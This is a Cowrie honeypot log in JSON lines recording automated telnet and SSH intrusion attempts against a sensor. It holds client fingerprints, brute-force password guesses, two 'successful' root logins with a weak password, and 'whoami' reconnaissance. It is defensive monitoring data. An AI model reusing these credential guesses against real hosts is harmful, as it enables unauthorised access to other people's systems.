{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-28T23:30:42.139836Z","src_ip":"212.227.125.160","session":"86e6f1115f98"}
{"eventid":"cowrie.session.closed","duration":12.693153142929077,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:30:50.152689Z","src_ip":"221.202.210.63","session":"c51c66419fab"}
{"eventid":"cowrie.session.connect","src_ip":"221.202.210.63","src_port":42923,"dst_ip":"1.2.3.4","dst_port":23,"session":"69ee9c540ea8","protocol":"telnet","message":"New connection: 221.202.210.63:42923 (1.2.3.4:23) [session: 69ee9c540ea8]","sensor":"my-vps","timestamp":"2025-08-28T23:30:50.352518Z"}
{"eventid":"cowrie.session.closed","duration":13.376084327697754,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:30:52.013162Z","src_ip":"221.202.210.63","session":"63a6bdc25486"}
{"eventid":"cowrie.session.connect","src_ip":"221.202.210.63","src_port":42998,"dst_ip":"1.2.3.4","dst_port":23,"session":"69d98b871b70","protocol":"telnet","message":"New connection: 221.202.210.63:42998 (1.2.3.4:23) [session: 69d98b871b70]","sensor":"my-vps","timestamp":"2025-08-28T23:30:52.232359Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":62240,"dst_ip":"1.2.3.4","dst_port":22,"session":"211f92d4cdb3","protocol":"ssh","message":"New connection: 212.227.235.229:62240 (1.2.3.4:22) [session: 211f92d4cdb3]","sensor":"my-vps","timestamp":"2025-08-28T23:31:02.992483Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T23:31:03.021304Z","src_ip":"212.227.235.229","session":"211f92d4cdb3"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T23:31:03.152993Z","src_ip":"212.227.235.229","session":"211f92d4cdb3"}
{"eventid":"cowrie.session.connect","src_ip":"221.202.210.63","src_port":43143,"dst_ip":"1.2.3.4","dst_port":23,"session":"688890d453bd","protocol":"telnet","message":"New connection: 221.202.210.63:43143 (1.2.3.4:23) [session: 688890d453bd]","sensor":"my-vps","timestamp":"2025-08-28T23:31:03.175281Z"}
{"eventid":"cowrie.session.closed","duration":13.135178804397583,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:31:03.487629Z","src_ip":"221.202.210.63","session":"69ee9c540ea8"}
{"eventid":"cowrie.login.failed","username":"malia","password":"malia","message":"login attempt [malia/malia] failed","sensor":"my-vps","timestamp":"2025-08-28T23:31:03.718012Z","src_ip":"212.227.235.229","session":"211f92d4cdb3"}
{"eventid":"cowrie.login.failed","username":"malia","password":"malia1","message":"login attempt [malia/malia1] failed","sensor":"my-vps","timestamp":"2025-08-28T23:31:04.851298Z","src_ip":"212.227.235.229","session":"211f92d4cdb3"}
{"eventid":"cowrie.session.closed","duration":13.016290664672852,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:31:05.248580Z","src_ip":"221.202.210.63","session":"69d98b871b70"}
{"eventid":"cowrie.session.connect","src_ip":"221.202.210.63","src_port":43195,"dst_ip":"1.2.3.4","dst_port":23,"session":"e66ee6f03abd","protocol":"telnet","message":"New connection: 221.202.210.63:43195 (1.2.3.4:23) [session: e66ee6f03abd]","sensor":"my-vps","timestamp":"2025-08-28T23:31:05.420816Z"}
{"eventid":"cowrie.login.failed","username":"malia","password":"malia123","message":"login attempt [malia/malia123] failed","sensor":"my-vps","timestamp":"2025-08-28T23:31:05.984485Z","src_ip":"212.227.235.229","session":"211f92d4cdb3"}
{"eventid":"cowrie.login.failed","username":"malia","password":"malia1234","message":"login attempt [malia/malia1234] failed","sensor":"my-vps","timestamp":"2025-08-28T23:31:07.117311Z","src_ip":"212.227.235.229","session":"211f92d4cdb3"}
{"eventid":"cowrie.login.failed","username":"malia","password":"malia12345","message":"login attempt [malia/malia12345] failed","sensor":"my-vps","timestamp":"2025-08-28T23:31:08.249223Z","src_ip":"212.227.235.229","session":"211f92d4cdb3"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:31:09.381258Z","src_ip":"212.227.235.229","session":"211f92d4cdb3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40920,"dst_ip":"1.2.3.4","dst_port":22,"session":"219ef2c9cc6d","protocol":"ssh","message":"New connection: 212.227.125.160:40920 (1.2.3.4:22) [session: 219ef2c9cc6d]","sensor":"my-vps","timestamp":"2025-08-28T23:31:12.360177Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:31:13.924141Z","src_ip":"212.227.125.160","session":"219ef2c9cc6d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:31:13.924930Z","src_ip":"212.227.125.160","session":"219ef2c9cc6d"}
{"eventid":"cowrie.session.closed","duration":13.000195264816284,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:31:16.175389Z","src_ip":"221.202.210.63","session":"688890d453bd"}
{"eventid":"cowrie.session.connect","src_ip":"221.202.210.63","src_port":43345,"dst_ip":"1.2.3.4","dst_port":23,"session":"e4f1df88cf63","protocol":"telnet","message":"New connection: 221.202.210.63:43345 (1.2.3.4:23) [session: e4f1df88cf63]","sensor":"my-vps","timestamp":"2025-08-28T23:31:16.444431Z"}
{"eventid":"cowrie.session.closed","duration":12.779106616973877,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:31:18.199856Z","src_ip":"221.202.210.63","session":"e66ee6f03abd"}
{"eventid":"cowrie.session.connect","src_ip":"221.202.210.63","src_port":43362,"dst_ip":"1.2.3.4","dst_port":23,"session":"9e1295b60928","protocol":"telnet","message":"New connection: 221.202.210.63:43362 (1.2.3.4:23) [session: 9e1295b60928]","sensor":"my-vps","timestamp":"2025-08-28T23:31:18.410238Z"}
{"eventid":"cowrie.login.success","username":"root","password":"q1w2e3r4","message":"login attempt [root/q1w2e3r4] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:31:20.581408Z","src_ip":"212.227.125.160","session":"219ef2c9cc6d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:31:23.142959Z","src_ip":"212.227.125.160","session":"219ef2c9cc6d"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-28T23:31:23.143810Z","src_ip":"212.227.125.160","session":"219ef2c9cc6d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:31:24.538175Z","src_ip":"212.227.125.160","session":"219ef2c9cc6d"}
{"eventid":"cowrie.session.closed","duration":"12.2","message":"Connection lost after 12.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:31:24.539688Z","src_ip":"212.227.125.160","session":"219ef2c9cc6d"}
{"eventid":"cowrie.session.closed","duration":12.893800258636475,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:31:29.338173Z","src_ip":"221.202.210.63","session":"e4f1df88cf63"}
{"eventid":"cowrie.session.connect","src_ip":"221.202.210.63","src_port":43521,"dst_ip":"1.2.3.4","dst_port":23,"session":"1dd053282ad4","protocol":"telnet","message":"New connection: 221.202.210.63:43521 (1.2.3.4:23) [session: 1dd053282ad4]","sensor":"my-vps","timestamp":"2025-08-28T23:31:29.472325Z"}
{"eventid":"cowrie.session.closed","duration":12.637653827667236,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:31:31.047795Z","src_ip":"221.202.210.63","session":"9e1295b60928"}
{"eventid":"cowrie.session.connect","src_ip":"221.202.210.63","src_port":43527,"dst_ip":"1.2.3.4","dst_port":23,"session":"f7dc00db0c75","protocol":"telnet","message":"New connection: 221.202.210.63:43527 (1.2.3.4:23) [session: f7dc00db0c75]","sensor":"my-vps","timestamp":"2025-08-28T23:31:31.264033Z"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":40634,"dst_ip":"1.2.3.4","dst_port":22,"session":"94570d12e9ce","protocol":"ssh","message":"New connection: 201.148.180.50:40634 (1.2.3.4:22) [session: 94570d12e9ce]","sensor":"my-vps","timestamp":"2025-08-28T23:31:31.371551Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:31:32.201196Z","src_ip":"201.148.180.50","session":"94570d12e9ce"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:31:32.201970Z","src_ip":"201.148.180.50","session":"94570d12e9ce"}
{"eventid":"cowrie.login.success","username":"root","password":"q1w2e3r4","message":"login attempt [root/q1w2e3r4] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:31:39.954246Z","src_ip":"201.148.180.50","session":"94570d12e9ce"}
{"eventid":"cowrie.session.closed","duration":12.709145069122314,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:31:42.181394Z","src_ip":"221.202.210.63","session":"1dd053282ad4"}
{"eventid":"cowrie.session.connect","src_ip":"221.202.210.63","src_port":43690,"dst_ip":"1.2.3.4","dst_port":23,"session":"cdb1ac1007f3","protocol":"telnet","message":"New connection: 221.202.210.63:43690 (1.2.3.4:23) [session: cdb1ac1007f3]","sensor":"my-vps","timestamp":"2025-08-28T23:31:42.365676Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:31:42.958024Z","src_ip":"201.148.180.50","session":"94570d12e9ce"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-28T23:31:42.958745Z","src_ip":"201.148.180.50","session":"94570d12e9ce"}
{"eventid":"cowrie.session.closed","duration":12.988510131835938,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:31:44.252458Z","src_ip":"221.202.210.63","session":"f7dc00db0c75"}
{"eventid":"cowrie.session.connect","src_ip":"221.202.210.63","src_port":43703,"dst_ip":"1.2.3.4","dst_port":23,"session":"a86a18647796","protocol":"telnet","message":"New connection: 221.202.210.63:43703 (1.2.3.4:23) [session: a86a18647796]","sensor":"my-vps","timestamp":"2025-08-28T23:31:44.492770Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"1.6","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:31:44.571706Z","src_ip":"201.148.180.50","session":"94570d12e9ce"}
{"eventid":"cowrie.session.closed","duration":"13.2","message":"Connection lost after 13.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:31:44.600133Z","src_ip":"201.148.180.50","session":"94570d12e9ce"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34488,"dst_ip":"1.2.3.4","dst_port":23,"session":"2fe10dc340b5","protocol":"telnet","message":"New connection: 212.227.235.229:34488 (1.2.3.4:23) [session: 2fe10dc340b5]","sensor":"my-vps","timestamp":"2025-08-28T23:31:53.871928Z"}
{"eventid":"cowrie.session.closed","duration":12.843576431274414,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:31:55.209176Z","src_ip":"221.202.210.63","session":"cdb1ac1007f3"}
{"eventid":"cowrie.session.connect","src_ip":"221.202.210.63","src_port":43858,"dst_ip":"1.2.3.4","dst_port":23,"session":"2f78284a5d92","protocol":"telnet","message":"New connection: 221.202.210.63:43858 (1.2.3.4:23) [session: 2f78284a5d92]","sensor":"my-vps","timestamp":"2025-08-28T23:31:55.401620Z"}
{"eventid":"cowrie.session.closed","duration":12.561168670654297,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:31:57.053864Z","src_ip":"221.202.210.63","session":"a86a18647796"}
{"eventid":"cowrie.session.connect","src_ip":"221.202.210.63","src_port":43866,"dst_ip":"1.2.3.4","dst_port":23,"session":"c2a634b8c324","protocol":"telnet","message":"New connection: 221.202.210.63:43866 (1.2.3.4:23) [session: c2a634b8c324]","sensor":"my-vps","timestamp":"2025-08-28T23:31:57.248825Z"}
{"eventid":"cowrie.session.closed","duration":12.680253982543945,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:32:08.081805Z","src_ip":"221.202.210.63","session":"2f78284a5d92"}
{"eventid":"cowrie.session.connect","src_ip":"221.202.210.63","src_port":44028,"dst_ip":"1.2.3.4","dst_port":23,"session":"d217b675b750","protocol":"telnet","message":"New connection: 221.202.210.63:44028 (1.2.3.4:23) [session: d217b675b750]","sensor":"my-vps","timestamp":"2025-08-28T23:32:08.296358Z"}
{"eventid":"cowrie.session.closed","duration":13.006169319152832,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:32:10.254922Z","src_ip":"221.202.210.63","session":"c2a634b8c324"}
{"eventid":"cowrie.session.connect","src_ip":"221.202.210.63","src_port":44063,"dst_ip":"1.2.3.4","dst_port":23,"session":"ebc9e9133cf0","protocol":"telnet","message":"New connection: 221.202.210.63:44063 (1.2.3.4:23) [session: ebc9e9133cf0]","sensor":"my-vps","timestamp":"2025-08-28T23:32:10.421191Z"}
{"eventid":"cowrie.session.closed","duration":12.994771480560303,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:32:21.291055Z","src_ip":"221.202.210.63","session":"d217b675b750"}
{"eventid":"cowrie.session.connect","src_ip":"221.202.210.63","src_port":44224,"dst_ip":"1.2.3.4","dst_port":23,"session":"299d37fcc2d6","protocol":"telnet","message":"New connection: 221.202.210.63:44224 (1.2.3.4:23) [session: 299d37fcc2d6]","sensor":"my-vps","timestamp":"2025-08-28T23:32:21.528028Z"}
{"eventid":"cowrie.session.closed","duration":12.64262056350708,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:32:23.063742Z","src_ip":"221.202.210.63","session":"ebc9e9133cf0"}
{"eventid":"cowrie.session.connect","src_ip":"221.202.210.63","src_port":44289,"dst_ip":"1.2.3.4","dst_port":23,"session":"9bd56949a451","protocol":"telnet","message":"New connection: 221.202.210.63:44289 (1.2.3.4:23) [session: 9bd56949a451]","sensor":"my-vps","timestamp":"2025-08-28T23:32:23.258960Z"}
{"eventid":"cowrie.session.closed","duration":30.481117248535156,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:32:24.352980Z","src_ip":"212.227.235.229","session":"2fe10dc340b5"}
{"eventid":"cowrie.session.closed","duration":12.863326787948608,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:32:34.391286Z","src_ip":"221.202.210.63","session":"299d37fcc2d6"}
{"eventid":"cowrie.session.connect","src_ip":"221.202.210.63","src_port":44455,"dst_ip":"1.2.3.4","dst_port":23,"session":"c7ca0a192ca0","protocol":"telnet","message":"New connection: 221.202.210.63:44455 (1.2.3.4:23) [session: c7ca0a192ca0]","sensor":"my-vps","timestamp":"2025-08-28T23:32:34.578346Z"}
{"eventid":"cowrie.session.closed","duration":12.823566198348999,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:32:36.082428Z","src_ip":"221.202.210.63","session":"9bd56949a451"}
{"eventid":"cowrie.session.connect","src_ip":"221.202.210.63","src_port":44489,"dst_ip":"1.2.3.4","dst_port":23,"session":"c3994a425146","protocol":"telnet","message":"New connection: 221.202.210.63:44489 (1.2.3.4:23) [session: c3994a425146]","sensor":"my-vps","timestamp":"2025-08-28T23:32:36.306349Z"}
{"eventid":"cowrie.session.closed","duration":12.725315809249878,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:32:47.303594Z","src_ip":"221.202.210.63","session":"c7ca0a192ca0"}
{"eventid":"cowrie.session.connect","src_ip":"221.202.210.63","src_port":44663,"dst_ip":"1.2.3.4","dst_port":23,"session":"24a0da82f659","protocol":"telnet","message":"New connection: 221.202.210.63:44663 (1.2.3.4:23) [session: 24a0da82f659]","sensor":"my-vps","timestamp":"2025-08-28T23:32:47.522714Z"}
{"eventid":"cowrie.session.closed","duration":13.126616954803467,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:32:49.432871Z","src_ip":"221.202.210.63","session":"c3994a425146"}
{"eventid":"cowrie.session.connect","src_ip":"221.202.210.63","src_port":44673,"dst_ip":"1.2.3.4","dst_port":23,"session":"8e97ac534e05","protocol":"telnet","message":"New connection: 221.202.210.63:44673 (1.2.3.4:23) [session: 8e97ac534e05]","sensor":"my-vps","timestamp":"2025-08-28T23:32:49.624028Z"}
{"eventid":"cowrie.session.closed","duration":12.836286306381226,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:33:00.358917Z","src_ip":"221.202.210.63","session":"24a0da82f659"}
{"eventid":"cowrie.session.connect","src_ip":"221.202.210.63","src_port":44841,"dst_ip":"1.2.3.4","dst_port":23,"session":"a464a2d2ca59","protocol":"telnet","message":"New connection: 221.202.210.63:44841 (1.2.3.4:23) [session: a464a2d2ca59]","sensor":"my-vps","timestamp":"2025-08-28T23:33:00.627576Z"}
{"eventid":"cowrie.session.closed","duration":13.674798011779785,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:33:03.298757Z","src_ip":"221.202.210.63","session":"8e97ac534e05"}
{"eventid":"cowrie.session.connect","src_ip":"221.202.210.63","src_port":44858,"dst_ip":"1.2.3.4","dst_port":23,"session":"114ded1dc16a","protocol":"telnet","message":"New connection: 221.202.210.63:44858 (1.2.3.4:23) [session: 114ded1dc16a]","sensor":"my-vps","timestamp":"2025-08-28T23:33:03.516586Z"}
{"eventid":"cowrie.session.closed","duration":13.672748565673828,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:33:14.300226Z","src_ip":"221.202.210.63","session":"a464a2d2ca59"}
{"eventid":"cowrie.session.connect","src_ip":"221.202.210.63","src_port":45035,"dst_ip":"1.2.3.4","dst_port":23,"session":"a2fe92e984d1","protocol":"telnet","message":"New connection: 221.202.210.63:45035 (1.2.3.4:23) [session: a2fe92e984d1]","sensor":"my-vps","timestamp":"2025-08-28T23:33:14.441085Z"}
{"eventid":"cowrie.session.closed","duration":12.683576107025146,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:33:16.200085Z","src_ip":"221.202.210.63","session":"114ded1dc16a"}
{"eventid":"cowrie.session.connect","src_ip":"221.202.210.63","src_port":45050,"dst_ip":"1.2.3.4","dst_port":23,"session":"84cbb4339761","protocol":"telnet","message":"New connection: 221.202.210.63:45050 (1.2.3.4:23) [session: 84cbb4339761]","sensor":"my-vps","timestamp":"2025-08-28T23:33:16.444368Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56734,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b9be08a23b3","protocol":"ssh","message":"New connection: 212.227.125.160:56734 (1.2.3.4:22) [session: 2b9be08a23b3]","sensor":"my-vps","timestamp":"2025-08-28T23:33:26.138634Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:33:26.212201Z","src_ip":"212.227.125.160","session":"2b9be08a23b3"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T23:33:26.271840Z","src_ip":"212.227.125.160","session":"2b9be08a23b3"}
{"eventid":"cowrie.login.failed","username":"sol","password":"sol","message":"login attempt [sol/sol] failed","sensor":"my-vps","timestamp":"2025-08-28T23:33:26.975520Z","src_ip":"212.227.125.160","session":"2b9be08a23b3"}
{"eventid":"cowrie.session.closed","duration":12.967985153198242,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:33:27.408976Z","src_ip":"221.202.210.63","session":"a2fe92e984d1"}
{"eventid":"cowrie.session.connect","src_ip":"221.202.210.63","src_port":45226,"dst_ip":"1.2.3.4","dst_port":23,"session":"cf589a77c04e","protocol":"telnet","message":"New connection: 221.202.210.63:45226 (1.2.3.4:23) [session: cf589a77c04e]","sensor":"my-vps","timestamp":"2025-08-28T23:33:27.614212Z"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:33:28.028094Z","src_ip":"212.227.125.160","session":"2b9be08a23b3"}
{"eventid":"cowrie.session.closed","duration":12.725640058517456,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:33:29.169925Z","src_ip":"221.202.210.63","session":"84cbb4339761"}
{"eventid":"cowrie.session.connect","src_ip":"221.202.210.63","src_port":45255,"dst_ip":"1.2.3.4","dst_port":23,"session":"19d0a4919042","protocol":"telnet","message":"New connection: 221.202.210.63:45255 (1.2.3.4:23) [session: 19d0a4919042]","sensor":"my-vps","timestamp":"2025-08-28T23:33:30.440572Z"}
{"eventid":"cowrie.session.closed","duration":13.808459043502808,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:33:41.422597Z","src_ip":"221.202.210.63","session":"cf589a77c04e"}
{"eventid":"cowrie.session.connect","src_ip":"221.202.210.63","src_port":45486,"dst_ip":"1.2.3.4","dst_port":23,"session":"c54b775ecb03","protocol":"telnet","message":"New connection: 221.202.210.63:45486 (1.2.3.4:23) [session: c54b775ecb03]","sensor":"my-vps","timestamp":"2025-08-28T23:33:41.613084Z"}
